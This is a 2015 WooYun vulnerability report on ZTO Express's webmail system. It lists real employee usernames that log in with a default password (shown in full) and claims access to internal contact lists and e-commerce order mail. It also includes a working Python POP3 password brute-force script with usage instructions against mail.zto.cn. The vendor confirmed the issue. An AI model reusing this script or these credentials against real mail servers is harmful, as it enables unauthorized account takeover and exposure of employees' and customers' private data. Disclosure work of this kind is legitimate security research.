当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156014

漏洞标题:快递安全之中通速递邮箱系统多账号信息泄漏(涉及内部通讯录\当当、天猫等订单信息\附验证脚本)

相关厂商:中通速递

漏洞作者: harbour_bin

提交时间:2015-11-26 11:15

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-26: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

1、

URL:http://mail.zto.cn/index.php


[+] Login successful: zhouyanan zto123456
[+] Mail: 18882 emails
[+] Login successful: wangfang zto123456
[+] Mail: 212 emails
[+] Login successful: liyong zto123456
[+] Mail: 9 emails
[+] Login successful: liuting zto123456
[+] Mail: 44 emails
[+] Login successful: xiaoqian zto123456
[+] Mail: 16 emails
[+] Login successful: qiuline zto123456
[+] Mail: 109 emails
[+] Login successful: liping zto123456
[+] Mail: 957 emails
[+] Login successful: yeqing zto123456
[+] Mail: 273 emails
[+] Login successful: wangbin zto123456
[+] Mail: 205 emails
[-] Done


总结: zto123456应该是默认口令
2、登录邮箱, 证明一下危害
近2万封与当当、天猫的往来信息

zto.png


内部通讯录

zto1.png


每天订单

zto3.png


zto4.png


其他敏感信息

zto2.png


zto5.png


可进一步收集数据, 进行邮箱测试

漏洞证明:

已证明
测试代码, 可用于内部测试

#!usr/bin/python 
#!coding:utf-8
import sys,poplib
if len(sys.argv) !=4 and len(sys.argv) != 5:
print "\t Note: 邮箱类型为:中通 \n"
print "\t Note: 用户字典不需要域名后缀,例如zhangsan\n"
print "\t Usage: 使用方法:./mail.py type <userlist> <wordlist> mail.domain.com\n"
sys.exit(1)
server = sys.argv[4]
success = []
try:
users_list = open(sys.argv[2], "r")
users = users_list.readlines()
words_list = open(sys.argv[3], "r")
words = words_list.readlines()
except(IOError):
print "[-] Error: please check filename\n"
sys.exit(1)
finally:
users_list.close()
words_list.close()

try:
pop = poplib.POP3_SSL(server,995)
welcome = pop.getwelcome()
print welcome
pop.quit()
except (poplib.error_proto):
welcome = "[-] Error: No Response,Something wrong!!!\n"
sys.exit(1)
print "[+] Server:",server
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
def mailbruteforce(listuser,listpwd,type):
if len(listuser) < 1 or len(listpwd) < 1 :
print "[-] Error: An error occurred: No user or pass list\n"
return 1

for user in listuser:
for passwd in listpwd :
user = user.replace("\n","")
passwd = passwd.replace("\n","")

try:
print "-"*12
print "[+] User:",user,"Password:",passwd

#time.sleep(0.5)
popserver = poplib.POP3_SSL(server,995)
popserver.user(user)
auth = popserver.pass_(passwd)
print auth
if auth.split(' ')[0] == "+OK" or auth =="+OK":
ret = (user,passwd,popserver.stat()[0],popserver.stat()[1])
success.append(ret)
print len(success)
popserver.quit()
break
else :
popserver.quit()
continue

except:
#print "An error occurred:", msg
pass
if __name__ == '__main__':
mailbruteforce(users,words,sys.argv[1])

print "\t[+] have weakpass :\t",len(success)
if len(success) >=1:
for ret in success:
print "\n\n[+] Login successful:",ret[0], ret[1]
print "\t[+] Mail:",ret[2],"emails"
print "\n[-] Done"


useage:

D:\Python>python mail\zto.py Winmail mail\zto.txt mail\pass\pass0.txt mail.zto.cn


代码有些地方不是很完美, 但可以用的

修复方案:

你们更专业!
PS:SSO也有点有问题, 如果能扩大危害, 再提交吧...

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-26 11:53

厂商回复:

感谢白帽子的辛苦劳动,已经联系负责人处理。麻烦下次对联系方式等进行脱敏,谢谢。

最新状态:

暂无


漏洞评价:

评价

  1. 2015-11-26 11:17 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    下游安全…

  2. 2015-11-26 11:27 | harbour_bin ( 普通白帽子 | Rank:485 漏洞数:61 | 目标Rank 600)

    @疯狗 狗哥好...

  3. 2015-11-26 11:29 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @harbour_bin :)

  4. 2015-11-26 12:19 | harbour_bin ( 普通白帽子 | Rank:485 漏洞数:61 | 目标Rank 600)

    好快的速度...